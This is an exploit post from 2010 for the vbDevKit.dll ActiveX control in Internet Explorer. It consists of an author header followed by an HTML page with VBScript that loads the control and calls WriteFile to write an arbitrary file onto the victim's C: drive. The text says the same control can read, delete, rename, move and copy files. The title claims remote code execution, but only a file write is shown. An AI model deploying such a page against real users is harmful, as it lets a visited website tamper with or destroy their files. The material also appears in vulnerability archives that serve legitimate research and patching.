#######################################################################
  IE vbDevKit.dll ActiveX Control Multti Remote Code Execution
#######################################################################
#[+]Date       : 22 January 2010
#[+]version    : all versions
#[+]Author     : ahwak2000
#[+]Contact    : z.u5[at]hotmail.com
#[+]Geetz [2]  : germaya_x
#[+]tested on  : windows xp sp2&sp3 EN
#[+]Reference  : https://downloads.securityfocus.com/vulnerabilities/exploits/35725.pl
#[+]1. Is this for the COMRaider ActiveX bug? yes
#[+]2. Was this bug discovered by you? yes by me
#######################################################################
 
 you can Write,Read,Delete,Rename,Move and Copy File
 
exploit Write file
 
<html>
 
<p>
<object classid='clsid:9A077D0D-B4A6-4EC0-B6CF-98526DF589E4' id='target' ></object>
 
<script language='vbscript'>
 
targetFile = "C:\WINDOWS\vbDevKit.dll"
prototype  = "Sub WriteFile ( ByRef path As Variant ,  ByRef it As Variant )"
memberName = "WriteFile"
progid     = "vbDevKit.CVariantFileSystem"
argCount   = 2
arg1="c:\ahwak200.txt"
arg2="ahwak2000"
target.WriteFile arg1 ,arg2
</script></p>